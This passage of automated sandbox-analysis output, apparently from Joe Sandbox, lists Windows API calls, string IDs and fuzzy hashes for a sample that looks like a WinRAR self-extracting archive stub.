                                                                                                    • Instruction Fuzzy Hash: 5F413072900619ABCB29DF68CC88AE9B7B9FB48350F1841A6F559F3240D7346ED4CF91
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00E27DC4,?,00E3C300,0000000C,00E27F1B,?,00000002,00000000), ref: 00E27E0F
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00E27DC4,?,00E3C300,0000000C,00E27F1B,?,00000002,00000000), ref: 00E27E16
                                                                                                    • ExitProcess.KERNEL32 ref: 00E27E28
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: c7b33eda28a0e0119d40f2743504603aebe787dd8b264e046f5f0bddbd5977c9
                                                                                                    • Instruction ID: 00605961d3cb0bb1f275bb46620ff6e59558e1226ae61e254f7d1803a35fe58a
                                                                                                    • Opcode Fuzzy Hash: c7b33eda28a0e0119d40f2743504603aebe787dd8b264e046f5f0bddbd5977c9
                                                                                                    • Instruction Fuzzy Hash: FEE04631001158EFCF026F61ED0DE4A3FAAEB40341B054498F849AA132CB36DE96EAA0
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 53572b78e953b7ecdeef87e79c19bd16125e2b45ae809ef4ca9c3da683c24b7a
                                                                                                    • Instruction ID: aab9c6c0e6a6789646d4a140e94900ab48ae3085cd11c26cc481556feb4b079f
                                                                                                    • Opcode Fuzzy Hash: 53572b78e953b7ecdeef87e79c19bd16125e2b45ae809ef4ca9c3da683c24b7a
                                                                                                    • Instruction Fuzzy Hash: C782F970904245AEDF15DF64C991BFABBB9AF15304F0861B9D889BB2C3DB315AC4CB60
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: eec5908edb34743013aa15a84f4cdd00de7fea0f79c7497bfd2b618ebfd93e92
                                                                                                    • Instruction ID: 14c45c7c73191cc06673f81f27f92d3846a20a5750000c9ec4fdd85af4ccce88
                                                                                                    • Opcode Fuzzy Hash: eec5908edb34743013aa15a84f4cdd00de7fea0f79c7497bfd2b618ebfd93e92
                                                                                                    • Instruction Fuzzy Hash: 7BD1B3B16083408FDB14DF28D8447DBBBE1BF89708F08556DE889AB242D774EE85CB56
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E1B7E5
                                                                                                      • Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                      • Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1B8D1
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B8EF
                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 00E1B902
                                                                                                    • TranslateMessage.USER32(?), ref: 00E1B910
                                                                                                    • DispatchMessageW.USER32(?), ref: 00E1B91A
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00E1B93D
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00E1B960
                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00E1B983
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E1B99E
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E335F4), ref: 00E1B9B1
                                                                                                      • Part of subcall function 00E1D453: _wcschr.LIBVCRUNTIME ref: 00E1D45C
                                                                                                      • Part of subcall function 00E1D453: _wcslen.LIBCMT ref: 00E1D47D
                                                                                                    • SetFocus.USER32(00000000), ref: 00E1B9B8
                                                                                                    • _swprintf.LIBCMT ref: 00E1BA24
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                      • Part of subcall function 00E1D4D4: GetDlgItem.USER32(00000068,00E5FCB8), ref: 00E1D4E8
                                                                                                      • Part of subcall function 00E1D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00E1AF07,00000001,?,?,00E1B7B9,00E3506C,00E5FCB8,00E5FCB8,00001000,00000000,00000000), ref: 00E1D510
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E1D51B
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E335F4), ref: 00E1D529
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D53F
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E1D559
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D59D
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E1D5AB
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D5BA
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D5E1
                                                                                                      • Part of subcall function 00E1D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E343F4), ref: 00E1D5F0
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00E1BA68
                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00E1BA90
                                                                                                    • GetTickCount.KERNEL32 ref: 00E1BAAE
                                                                                                    • _swprintf.LIBCMT ref: 00E1BAC2
                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 00E1BAF4
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00E1BB43
                                                                                                    • _swprintf.LIBCMT ref: 00E1BB7C
                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00E1BBD0
                                                                                                    • GetCommandLineW.KERNEL32 ref: 00E1BBEA
                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00E1BC47
                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00E1BC6F
                                                                                                    • Sleep.KERNEL32(00000064), ref: 00E1BCB9
                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00E1BCE2
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E1BCEB
                                                                                                    • _swprintf.LIBCMT ref: 00E1BD1E
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1BD7D
                                                                                                    • SetDlgItemTextW.USER32(?,00000065,00E335F4), ref: 00E1BD94
                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 00E1BD9D
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E1BDAC
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E1BDBB
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1BE68
                                                                                                    • _wcslen.LIBCMT ref: 00E1BEBE
                                                                                                    • _swprintf.LIBCMT ref: 00E1BEE8
                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00E1BF32
                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00E1BF4C
                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 00E1BF55
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00E1BF6B
                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00E1BF85
                                                                                                    • SetWindowTextW.USER32(00000000,00E4A472), ref: 00E1BFA7
                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00E1C007
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1C01A
                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00E1C0BD
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00E1C197
                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00E1C1D9
                                                                                                      • Part of subcall function 00E1C73F: __EH_prolog.LIBCMT ref: 00E1C744
                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E1C1FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<$STARTDLG$^$__tmp_rar_sfx_access_check_%u$h$winrarsfxmappingfile.tmp$Q

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 00E1087C
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E1088E
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E108BF
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E10B69
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E10B83
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E10B93
                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,|<,00000000), ref: 00E10BB1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E10C09
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E10C1E
                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<,?,00000000,?,00000800), ref: 00E10C72
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00E10C9C
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,D=,00000800), ref: 00E10CD8
                                                                                                      • Part of subcall function 00E1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
                                                                                                      • Part of subcall function 00E1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858
                                                                                                    • _swprintf.LIBCMT ref: 00E10D4A
                                                                                                    • _swprintf.LIBCMT ref: 00E10D96
                                                                                                      • Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5
                                                                                                    • AllocConsole.KERNEL32 ref: 00E10D9E
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00E10DA8
                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00E10DAF
                                                                                                    • _wcslen.LIBCMT ref: 00E10DC4
                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00E10DD5
                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00E10DDC
                                                                                                    • Sleep.KERNEL32(00002710), ref: 00E10DE7
                                                                                                    • FreeConsole.KERNEL32 ref: 00E10DED
                                                                                                    • ExitProcess.KERNEL32 ref: 00E10DF5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                    • String ID: (=$,<$,@$0?$0A$4B$8>$D=$DXGIDebug.dll$H?$H@$HA$P>$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=$`@$d?$dA$dwmapi.dll$h=$h>$kernel32$uxtheme.dll$|<$|?$|@$<$>$?$@$A

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E1C744
                                                                                                      • Part of subcall function 00E1B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00E1B3FB
                                                                                                      • Part of subcall function 00E1AF98: _wcschr.LIBVCRUNTIME ref: 00E1B033
                                                                                                    • _wcslen.LIBCMT ref: 00E1CA0A
                                                                                                    • _wcslen.LIBCMT ref: 00E1CA13
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E1CA71
                                                                                                    • _wcslen.LIBCMT ref: 00E1CAB3
                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 00E1CBFB
                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 00E1CC36
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00E1CC46
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,00E4A472), ref: 00E1CC54
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E1CC7F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                    • String ID: %s.%d.tmp$<br>$<$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E0DA70
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E0DA91
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E0DAAC
                                                                                                      • Part of subcall function 00E0C29A: _wcslen.LIBCMT ref: 00E0C2A2
                                                                                                      • Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0
                                                                                                      • Part of subcall function 00E11B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E0BAE9,00000000,?,?,?,00010420), ref: 00E11BA0
                                                                                                    • _wcslen.LIBCMT ref: 00E0DDE9
                                                                                                    • __fprintf_l.LIBCMT ref: 00E0DF1C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9
                                                                                                    • API String ID: 557298264-1836506137
                                                                                                    • Opcode ID: e0e8fdb46b9d45f59144368f1bcd081bbf4815daa15395de1214700c12aea523
                                                                                                    • Instruction ID: d86cfd8f441eb592a5afdf14c1bd464a941d6f68106b57c61b17ef50095e0d71
                                                                                                    • Opcode Fuzzy Hash: e0e8fdb46b9d45f59144368f1bcd081bbf4815daa15395de1214700c12aea523
                                                                                                    • Instruction Fuzzy Hash: BE32DF71900218EBDB24EFA8CC46AEA77A5FF58304F40256AF905B72D1EBB19DC5CB50

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00E1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
                                                                                                      • Part of subcall function 00E1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
                                                                                                      • Part of subcall function 00E1B568: IsDialogMessageW.USER32(00010420,?), ref: 00E1B59E
                                                                                                      • Part of subcall function 00E1B568: TranslateMessage.USER32(?), ref: 00E1B5AC
                                                                                                      • Part of subcall function 00E1B568: DispatchMessageW.USER32(?), ref: 00E1B5B6
                                                                                                    • GetDlgItem.USER32(00000068,00E5FCB8), ref: 00E1D4E8
                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00E1AF07,00000001,?,?,00E1B7B9,00E3506C,00E5FCB8,00E5FCB8,00001000,00000000,00000000), ref: 00E1D510
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E1D51B
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E335F4), ref: 00E1D529
                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D53F
                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E1D559
                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D59D
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E1D5AB
                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D5BA
                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D5E1
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E343F4), ref: 00E1D5F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                    • String ID: \
                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                    • Opcode ID: 848af1b2c500c614caf317192cfb3eafa4d6ab7cfd7be63c24d6a09b1df22c45
                                                                                                    • Instruction ID: d41994c5f5864de44355647c49674c7dd04e267fb192968ccf793a0d6efece4e
                                                                                                    • Opcode Fuzzy Hash: 848af1b2c500c614caf317192cfb3eafa4d6ab7cfd7be63c24d6a09b1df22c45
                                                                                                    • Instruction Fuzzy Hash: 6731BE75545342AFE301DF21AC4AFAB7FACEB82748F00050CFA51A61A1DBA49A0DC776

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00E1D7AE
                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00E1D8DE
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00E1D91D
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00E1D959
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E1D97F
                                                                                                    • ShowWindow.USER32(?,00000001), ref: 00E1D9E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                    • String ID: .exe$.inf$PDu<$h$r
                                                                                                    • API String ID: 36480843-2155249188
                                                                                                    • Opcode ID: d1c689806e9340dfaab7e21e2b3f24c9e803e809b9f763c97d173073a5d7721d
                                                                                                    • Instruction ID: 24e49e1b0a86268e15319ed6e346fff098394038396f978b47fbe7b3f8ae9db7
                                                                                                    • Opcode Fuzzy Hash: d1c689806e9340dfaab7e21e2b3f24c9e803e809b9f763c97d173073a5d7721d
                                                                                                    • Instruction Fuzzy Hash: 6C51F37150C384AEDB309B25AC44BEBBBE5AF82748F04281DF5C1B7191E7B489C8CB52

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00E23C35,00000000,00000FA0,00E62088,00000000,?,00E23D60,00000004,InitializeCriticalSectionEx,00E36394,InitializeCriticalSectionEx,00000000), ref: 00E23C03
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: api-ms-$c*
                                                                                                    • API String ID: 3664257935-2985010064
                                                                                                    • Opcode ID: 0d9f8d5ee2dcdb2aee1b3455730df25a26e521f43338f41f09980432bd155159
                                                                                                    • Instruction ID: ea440ac220cf7c247cea12ec38892b15383c6eddf07f7765c667c4b2d6995e4b
                                                                                                    • Opcode Fuzzy Hash: 0d9f8d5ee2dcdb2aee1b3455730df25a26e521f43338f41f09980432bd155159
                                                                                                    • Instruction Fuzzy Hash: D2110636A04234ABCB328F79AC45B5A7BA49F01774F211251F911FB2A0E778EF048ED0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E257FB,00E257FB,?,?,?,00E2ABAC,00000001,00000001,2DE85006), ref: 00E2A9B5
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E2ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00E2AA3B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E2AB35
                                                                                                    • __freea.LIBCMT ref: 00E2AB42
                                                                                                      • Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E24286,?,0000015D,?,?,?,?,00E25762,000000FF,00000000,?,?), ref: 00E28E38
                                                                                                    • __freea.LIBCMT ref: 00E2AB4B
                                                                                                    • __freea.LIBCMT ref: 00E2AB70
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: 8b42f28a184ab8ab90929db59847b6b7e8c7d6c80958eec645a5d0ba3dc3020e
                                                                                                    • Instruction ID: 11804753f79b56228be2b9eba47ddd64b006349c941f5e3f26146c356864b010
                                                                                                    • Opcode Fuzzy Hash: 8b42f28a184ab8ab90929db59847b6b7e8c7d6c80958eec645a5d0ba3dc3020e
                                                                                                    • Instruction Fuzzy Hash: DB51E172A00226AFEB258F64EC41EABB7AAEF44714F19563DFC04F6140EB34DC40C692

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00E1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
                                                                                                      • Part of subcall function 00E1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858
                                                                                                    • OleInitialize.OLE32(00000000), ref: 00E1AC2F
                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E1AC66
                                                                                                    • SHGetMalloc.SHELL32(00E48438), ref: 00E1AC70
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                    • String ID: riched20.dll$3Ro
                                                                                                    • API String ID: 3498096277-3613677438

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00E07760,?,00000005,?,00000011), ref: 00E0995F
                                                                                                    • GetLastError.KERNEL32(?,?,00E07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E0996C
                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00E07760,?,00000005,?), ref: 00E099A2
                                                                                                    • GetLastError.KERNEL32(?,?,00E07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E099AA
                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00E07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E099F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                    • String ID:
                                                                                                    • API String ID: 1999340476-0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
                                                                                                    • IsDialogMessageW.USER32(00010420,?), ref: 00E1B59E
                                                                                                    • TranslateMessage.USER32(?), ref: 00E1B5AC
                                                                                                    • DispatchMessageW.USER32(?), ref: 00E1B5B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1266772231-0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00E1ABC2
                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00E1ABF9
                                                                                                      • Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1
                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00E1ABE9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                    • String ID: EDIT
                                                                                                    • API String ID: 4243998846-3080729518

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00E1DBF4
                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E1DC30
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentVariable
                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                    • API String ID: 1431749950-3493335439

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00E09795
                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00E097AD
                                                                                                    • GetLastError.KERNEL32 ref: 00E097DF
                                                                                                    • GetLastError.KERNEL32 ref: 00E097FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2244327787-0
                                                                                                    • Opcode ID: 86b23a795dc3515cf6c1c3a1c0818bc49a55f11b08bfa61a2bece47b7b2a2a06
                                                                                                    • Instruction ID: 41aee71baa53f36914a404624b4c64e55c66ca3c59abd33f3740cd7965693e3c
                                                                                                    • Opcode Fuzzy Hash: 86b23a795dc3515cf6c1c3a1c0818bc49a55f11b08bfa61a2bece47b7b2a2a06
                                                                                                    • Instruction Fuzzy Hash: CE11C232910204EBCF245F75C804AA93BA9FB42324F10D62AF456B52D3D7748EC4DB61
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00E240EF,00000000,00000000,?,00E2ACDB,00E240EF,00000000,00000000,00000000,?,00E2AED8,00000006,FlsSetValue), ref: 00E2AD66
